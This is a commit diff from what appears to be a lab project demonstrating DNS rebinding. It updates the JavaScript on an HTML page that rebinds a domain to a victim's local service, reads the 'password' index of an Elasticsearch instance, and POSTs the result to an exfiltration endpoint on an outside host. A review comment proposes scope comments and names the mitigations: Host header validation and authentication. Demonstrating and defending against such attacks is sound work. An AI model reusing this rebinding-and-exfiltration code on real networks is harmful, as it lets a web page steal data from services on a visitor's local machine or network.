
Commit 03b4b020 authored by Tabet Sami's avatar Tabet Sami

Merge branch 'sami/request-es-data-instead-of-es-status' into 'master'

feat: Request ES data (fake passwords) instead of ES status URI

See merge request !15
parents cd235ed7 fb2b4bd4
......@@ -13,10 +13,11 @@
<script charset="utf-8">
(async () => {
const ID = "{{ .ID }}"
const API = `${ID}.my.ip.paulcoignet.fr`;
const NDD = `my.ip.paulcoignet.fr`;
const API = `${ID}.${NDD}`;
const FLUSH = `${ID}.flush.my.ip.paulcoignet.fr`;
const port = 8080;
const url = `http://${API}:${port}/`;
const url = `http://${API}:${port}`;
// From: https://github.com/nccgroup/singularity/blob/8313182a2a6573b7ebe3243d77f70cf409d7d566/html/payload.js#L38
async function flush() {
......@@ -34,9 +35,9 @@
);
}
async function request(uri, port) {
async function request() {
try {
const data = await fetch(`http://${API}:${port}/${uri}`);
const data = await fetch(`${url}/password/_search?pretty=true&q=*:*`);
const txt = await data.text();
return txt;
} catch (e) {
......@@ -46,7 +47,7 @@
async function rebind(rebindTTL) {
try {
const data = await fetch(`http://${API}:8080/api/rebind`, {
const data = await fetch(`${url}/api/rebind`, {
method: "POST",
body: JSON.stringify({
ndd: `${API}.`,
......@@ -65,7 +66,7 @@
async function exfiltrate(data) {
try {
return fetch(`http://${API}:8080/api/exfiltrate`, {
return fetch(`http://${NDD}:${port}/api/exfiltrate`, {
method: "POST",
body: data
});
......@@ -84,19 +85,12 @@
await flush();
console.log("Request locally");
const res = await request("", 8080);
const res = await request();
console.log("response", res);
console.log("Second flush");
const flushing = flush();
// Wait for the flush to end and the rebind to expire
setTimeout(async function() {
await flushing;
// Wait for the rebind to expire
console.log(await exfiltrate(res));
console.log("done exfiltrating");
}, 1.1 * rebindTTL * 1000);
// Wait for the rebind to expire
console.log(await exfiltrate(res));
console.log("done exfiltrating");
})();
</script>
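Review bot: `request()` now takes no arguments and hard-codes `/password/_search?pretty=true&q=*:*`, but nothing in the script says what that path is meant to reach; only the commit title mentions that it is Elasticsearch test data. A comment above the function would make the demo's scope explicit, for example `// Lab demo: reads the fake "password" index of the test Elasticsearch instance.` For readers using this page to learn about the defence, a second comment could state the precondition the demo appears to rely on: `// Only works if the service accepts any Host header and needs no authentication.` That comment points directly at the mitigations, which are Host header validation and authentication on the local service. The `catch` branch of `request()` lies outside the visible hunk, so its error handling is not reviewed here.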
......
......@@ -72,9 +72,7 @@
<td>{{ $ex.ID }}</td>
<td>{{ $ex.Data }}</td>
</tr>
{{
end
}}
{{ end }}
</table>
</body>
</html>